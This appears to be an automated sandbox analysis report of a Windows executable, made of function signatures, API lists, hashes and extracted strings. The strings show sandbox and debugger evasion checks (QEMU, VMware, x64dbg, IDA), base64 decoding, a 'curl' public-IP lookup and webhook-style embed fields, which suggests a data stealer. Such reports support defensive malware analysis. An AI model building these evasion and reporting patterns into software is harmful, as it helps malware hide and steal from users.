                                        • String ID: NtQueryInformationProcess$QEMU$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$ntdll.dll$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3226424356-3571693660
                                        • Opcode ID: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction ID: cbe2f9e68ec8a7cc90c471270a4e52c6ed49ebc976a6e004f1f20c377a596412
                                        • Opcode Fuzzy Hash: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction Fuzzy Hash: F9310A27A2CB87A1EA519B10E4257BA2761FF48788FA40132CE4DD3764DF7DE549C320

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValuestrstr
                                        • String ID: QEMU$SYSTEM\HardwareConfig\Current\$SystemManufacturer$VMware$Virtual$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3146380931-3937382361
                                        • Opcode ID: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction ID: 404f3f4b8c647dd60e3e9450767abbdd2855e0342ee1279cf2e95892fcf493b4
                                        • Opcode Fuzzy Hash: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction Fuzzy Hash: D0313A33A2CA96A5EB508B20E8506AA23A5FB8478CF940132DE8DD3764DF3CE549C710

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID: DebugPolicy$QEMU$SYSTEM\CurrentControlSet\Control\CI\Policy$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 1607946009-952540290
                                        • Opcode ID: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction ID: de05a732a22a488539b26af368c21550c9156ba7ab9087fa34c8e9dda193ef13
                                        • Opcode Fuzzy Hash: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction Fuzzy Hash: FA216D27A2CA87A1EB608B10E4257AA6365FB8475CF901133EE8DC3754DF3DE649C720

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterV01@$??6?$basic_ostream@D@std@@@std@@FrequencySleepU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 353636290-478688673
                                        • Opcode ID: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction ID: b31b3f6741d9c2a0ace6ee0eb85045fdb2198228583c79bb8abf7627499399a4
                                        • Opcode Fuzzy Hash: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction Fuzzy Hash: 2D216223A2CE87A5EA01DB20E4256A96322FF84798F504133DD0ED3720DF3CE54AC720

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: V01@$??6?$basic_ostream@CheckCurrentD@std@@@std@@DebuggerPresentProcessRemoteU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3386908335-478688673
                                        • Opcode ID: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction ID: cfa2641c10ac12c3ebf837f195a62c048f7e79fe587c81a40db707946709eb37
                                        • Opcode Fuzzy Hash: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction Fuzzy Hash: 1F111827A2CA86A2EA508B10E4257E92361FB4434CFA00133DE4DD3724CF3DEA4AC720

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateExceptionFileReadThrow$ObjectPipeProcessSingleWaitmemmove
                                        • String ID: CreatePipe failed$CreateProcess failed$System
                                        • API String ID: 1891516669-1096748438
                                        • Opcode ID: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction ID: 9171701029652ae1236cd8308f658bdc575599d7caa623d2d9af715a3df84718
                                        • Opcode Fuzzy Hash: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction Fuzzy Hash: 83713B22A28B82A6EB10CF61E8543AD7764FB84788F105236EE4DD3B68DF7CD595C710

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturnfgets$_pclose_popen
                                        • String ID: curl -s $https://api.ipify.org
                                        • API String ID: 4263605086-4145788705
                                        • Opcode ID: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction ID: 47608d847490b985c27630414bbc9067e03ebc0f0094d7aabede2235c6ac2190
                                        • Opcode Fuzzy Hash: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction Fuzzy Hash: 95919A23E2CBC596EA00CB64D8413AE2361FB96B94F545321EE9D97B99DF3CE181C710

                                        Control-flow Graph

                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC45A9
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC45C9
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC45D9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC4626
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF670FC464F
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC4676
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FC46BC
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FC46C3
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FC46D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID: VBox
                                        • API String ID: 4121003011-8870058
                                        • Opcode ID: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction ID: e67ad0baaba02cac7801cddc41a715b16f74278086f1584a7ffa8ea204fb888f
                                        • Opcode Fuzzy Hash: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction Fuzzy Hash: B0518C2361CA8192EB209F19E19023DABA1FB85F95F15C631CE5EC37A0CF7EE4468310

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: File$memmove$AttributesCopyFolderFreeKnownModuleNamePathTask_invalid_parameter_noinfo_noreturn
                                        • String ID: System$\java.exe
                                        • API String ID: 1966085478-2838124431
                                        • Opcode ID: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction ID: 48b85b0b9def74e1f70f82fbd6b2b7d2ee4e5432393e0c7a74397262ae1515c6
                                        • Opcode Fuzzy Hash: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction Fuzzy Hash: 74418923A2CAC1A2EB009F25E45536E6361FB84B94F505232DE9DC3B99DFBCE195C710
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3B25
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC3B45
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FC3B55
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC3B9C
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF670FC3BC9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF670FC3BEA
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FC3C30
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FC3C37
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FC3C44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 4121003011-0
                                        • Opcode ID: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction ID: 210e595b0581b20ff6d4d63e8a93f14aeef1ca9e114cc1e94e654c024bf3ef66
                                        • Opcode Fuzzy Hash: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction Fuzzy Hash: C7511C33A1CA8192EB608F19D59123DABA0EB85FD5F158632CE5EC7760CF3DD8468310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                        • String ID:
                                        • API String ID: 1133592946-0
                                        • Opcode ID: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction ID: 1f84c3e8b387db6aef318f02613b3f98466e3b8c71a889bc4b824e2773f0a9c0
                                        • Opcode Fuzzy Hash: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction Fuzzy Hash: B4311823E2C6C361EA54AB21A4133BE6291AF81788F544236ED4ECB7D3DF2DB404D261
                                        APIs
                                        • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF670FC4725
                                        • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF670FC4731
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FC473A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                                        • String ID:
                                        • API String ID: 1875450691-0
                                        • Opcode ID: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction ID: 8a315034f1e253ccbedb650bffb55152022f6d9f1fe6673502879f2570020401
                                        • Opcode Fuzzy Hash: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction Fuzzy Hash: 7BD06716A99A4692DA589F66B8A827C1321EF99F56B1CA031CD0FC7361CE3CD0998324
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC6065
                                        • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC60A6
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC60DF
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC6195
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC6141
                                          • Part of subcall function 00007FF670FC11E0: __std_exception_copy.VCRUNTIME140 ref: 00007FF670FC121E
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC61B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: BinaryCryptExceptionStringThrow$__std_exception_copy_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: Failed to calculate decoded size$Failed to decode base64 string$System
                                        • API String ID: 1426166207-3746013482
                                        • Opcode ID: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction ID: 54308ffedeac610ebcd3357153de7a04d30e7327fea92a16d174befa705ddf7f
                                        • Opcode Fuzzy Hash: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction Fuzzy Hash: 8A417D33A2CB86A5EA50DF11E44166A7361FB85B80F544235EE8CC3BA5DF3CE581CB10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_taskmemmove$_invalid_parameter_noinfo_noreturn$malloc
                                        • String ID: Security$color$fields$footer$image$inline$name$text$timestamp$url$value
                                        • API String ID: 1983001648-1717039157
                                        • Opcode ID: 46a93c1391e5530b796bf4ef33a6f6c6df3b4114b60fd8324e3daca41818a151
                                        • Instruction ID: ca8e4337640520f9c552b021f358b67ad421607f9aba6805a150eac8d3f23b68
                                        • Opcode Fuzzy Hash: 46a93c1391e5530b796bf4ef33a6f6c6df3b4114b60fd8324e3daca41818a151
                                        • Instruction Fuzzy Hash: 26724023918BC199E721CF74D8853DE73A4FB99308F545226DA8C97B5AEF78D294C340
                                        APIs
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 313767242-0
                                        • Opcode ID: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction ID: 97720e5b1968db7f467b7f1d0f0c5d7b94f44192c6290f3eff956dcf75d54a8d
                                        • Opcode Fuzzy Hash: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction Fuzzy Hash: 8F310773619AC196EB648F60E8503AE7360FB84748F44413ADA4EC7B99DF3CD648C720
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: QEMU$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$ollydbg.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 0-95170236
                                        • Opcode ID: 2be2b4a24daddba2019c7d8ab6ed27390f433343e14a35d974c3f9b3d3575544
                                        • Instruction ID: 4518031c1a480782708b9485da314e5b1f699194292a13dd427a395aff2d27d8
                                        • Opcode Fuzzy Hash: 2be2b4a24daddba2019c7d8ab6ed27390f433343e14a35d974c3f9b3d3575544
                                        • Instruction Fuzzy Hash: E0214D3762CB86A5E700CB14E8156A977A4FB84748F924132DE4CD3724DF3CE64AC750
                                        APIs
                                        Similarity
                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 2933794660-0
                                        • Opcode ID: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction ID: cfe711724a4483031e210e7c79fc91b7fb8169001087d1df8c9869a806bdc72a
                                        • Opcode Fuzzy Hash: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction Fuzzy Hash: 0C111822B28B429AEB00CB61E8693A833A4FB19758F441A31DE6DC77A4EF7CD1548350
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: ":
                                        • API String ID: 0-3662656813
                                        • Opcode ID: afdbd9ddc8ce0d2222de8917e83101ed04607f0d8a705a8498dbb296d46f9d9f
                                        • Instruction ID: 9779ec1d86a7fc1294aa373f6aba8f49ef2ecc4df104d92c623bc4b3c88f8eb3
                                        • Opcode Fuzzy Hash: afdbd9ddc8ce0d2222de8917e83101ed04607f0d8a705a8498dbb296d46f9d9f
                                        • Instruction Fuzzy Hash: C4B1347761CA8591DB248B26D1893AE6BA1FB88F88F449026CF4E87760DF3DD454C740
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31f0e806717852df5f15dadfbf27ccdab67af9a18becda2ccef3f99adf619f2f
                                        • Instruction ID: 0c8c3789d2e6b4225ff2c7317b0dfa9d4b84f707355a6be55cb4b402ba32539f
                                        • Opcode Fuzzy Hash: 31f0e806717852df5f15dadfbf27ccdab67af9a18becda2ccef3f99adf619f2f
                                        • Instruction Fuzzy Hash: 3B5104A3B056C443DB248B49F842796F7A5FB987C5F00A126EE8D97B68EB3CD5808700
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e43fc8981292af54a203ab563a8965c8683d3708787b238fdd77fd2831c2a668
                                        • Instruction ID: f17e6a8e325e342b94d022a8cea1b3b4b72d74066283e5383949b68969ba2efe
                                        • Opcode Fuzzy Hash: e43fc8981292af54a203ab563a8965c8683d3708787b238fdd77fd2831c2a668
                                        • Instruction Fuzzy Hash: 89A0012A92C886A0E6098B00E8612362220AB55304B900131D80DC36609F3CA5409220
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FCB158
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF670FCB178
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF670FCB188
                                        • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF670FCB1AD
                                        • ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF670FCB1C0
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FCB1DD
                                        • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF670FCB20F
                                        • ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF670FCB240
                                        • ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF670FCB288
                                        • ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3@Z.MSVCP140 ref: 00007FF670FCB31B
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF670FCB338
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF670FCB346
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF670FCB353
                                        Strings
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@V?$ostreambuf_iterator@$?good@ios_base@std@@D@std@@@std@@@std@@Lockit@std@@$??0_??1_?flush@?$basic_ostream@?getloc@ios_base@std@@?put@?$time_put@?setstate@?$basic_ios@?uncaught_exceptions@std@@Bid@locale@std@@D@std@@@2@Getcat@?$time_put@Getgloballocale@locale@std@@Locimp@12@Osfx@?$basic_ostream@Utm@@V12@V32@V42@@Vfacet@locale@2@Vios_base@2@Vlocale@2@
                                        • String ID: Security$System
                                        • API String ID: 2601024164-2661570791
                                        • Opcode ID: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
